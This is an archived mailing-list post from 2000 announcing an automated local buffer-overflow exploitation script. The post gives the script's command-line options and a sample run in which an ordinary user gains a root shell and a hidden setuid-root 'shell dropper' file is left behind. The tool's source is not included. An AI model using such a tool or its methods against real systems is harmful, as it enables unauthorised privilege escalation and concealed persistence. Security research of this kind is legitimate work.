NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 2000-q3

Subject: New Tool: initd_.sh;
From: zaboo.ma.fu
Date: Tue Sep 05 2000 - 00:17:15 CDT

Next message: Bluefish (P.Magnusson): "Re: stackguard-like embedded protection"
Previous message: Lincoln Yeoh: "Re: IDS&SSL - some thoughs perhaps"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

/*** Attachment did not send... resending (sorry for the bulk) ***/
Heyas ;)
    I wrote this tool in the last couple of days to see if I could
actually implement
a program that would automatically attack local binaries and attempt to
find exploits
in respect to buffer overflows via command line switches.
    Despite the script's simplicity I do believe it is a powerful tool
that will aid in securing
any Linux box although I refuse to blindly advertise this as an end all
be all to local
security. As I note in the readme there are numerous discrepancies that
limit the
programs strength, however, _most_ (if not all) of these issues will be
resolved in
upcoming releases of this program.
    Instead of explaining the entire process and capability I'll just
paste the --help
output at the end of this message. Also I'll paste an example usage for

fun ;D
    This program is a first of its kind as far as I know ;) I'm pretty
excited to see the
response I get from the community.
    Portability to as many operating systems as possible will be
integrated asap,
however it will take a week or two as I am generating the configurable
shellcode
myself (something I have never done before at this level).
    Anyway, I hope you enjoy this beta release!

Sincerely,
    initd_
    initd_digital.net
    0x7F Security Research

Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
- initd_'s verse >;)

---- Help Output ----
seychelles.initd_ % ./initd_.sh
Note: For further explanation on switches consult documentation
usage: initd_.sh [options]
options:
-t filename Define the target binary as 'filename'
--min_buffer int Define minimum buffer size as 'int'
--max_buffer int Define maximum buffer size as 'int'
--jmp_buffer int Define buffer increment value as 'int'
--min_offset int Define minimum offset size as 'int'
--max_offset int Define maximum offset size as 'int'
--jmp_offset int Define offset increment value as 'int'
--tmp_dir dir Force all tmp files to be written to 'dir'
--rsd_dir dir Force the RSD directory to be 'dir'
--rsdct_dir dir Force the RSDCT directory to be 'dir'
--et_dir dir Force the ET directory to be 'dir'
--uid int Force user id of target binary to 'int'
--gid int Force group id of target binary to 'int'
-n Do not query program for command line switches
-s switches Pass a quoted string of switches to test
-q Switch messaging to quiet mode
-v Increase program verbocity (3 levels max)
--help | -h Display program usage
Send comments/questions/bugs to: initd_digital.net
0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---
phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex
--min_buffer 1024 -v -v -v
#
# initd_.sh
# Automated Exploitation Tool v0.0.3
#
# 0x7f Security Research: Something Wicked This Way Comes...
#
[+] Target Confirmed
[+] Binary is not stripped
[+] Strip has been located. Exploit stealth has increased
[+] Confirmed temp directory
[+] RSD Directory confirmed
[+] Configuring for a Linux system on a i586 chip
[ ] Owner of target is root
[ ] Group name of target is root
[+] User id # determined to be 0
[+] Group id number determined to be 0
[ ] Creating the Root Shell Dropper
[+] RSD Creation Successful
[ ] Creating Root Shell Dropper Configuration Tool
[+] RSDCT Creation Successful
[ ] Creating Exploitation Tool
[+] ET Creation Succeeded
[ ] Current Switch: -s
[ ] Current Buffer Size: 1024
[ ] Current Offset: -100
[ ] Current Offset: 0
[ ] Current Offset: 100
[ ] Current Offset: 200
[ ] Current Offset: 300
[ ] Current Offset: 400
[+] Executing Cleanup
[+] Cleanup Complete
[ ] Welcome to the Dark Side
sh-2.02# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.02# exit
exit
phoenix.initd_ % ls -la
total 38
drwxr-xr-x 2 initd_ users 1024 Sep 5 01:05 .
drwxr-xr-x 4 initd_ users 1024 Sep 5 00:31 ..
-rwsr-sr-x 1 root root 3192 Sep 5 01:05 .bash_log1n
-rw-r--r-- 1 initd_ users 9863 Sep 5 00:30 Readme
-rwxr-xr-x 1 initd_ users 21313 Sep 5 00:22 initd_.sh
phoenix.initd_ %
---EOF---

Enjoy ;)

application/x-gzip attachment: initd_.tar.gz

Next message: Bluefish (P.Magnusson): "Re: stackguard-like embedded protection"
Previous message: Lincoln Yeoh: "Re: IDS&SSL - some thoughs perhaps"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]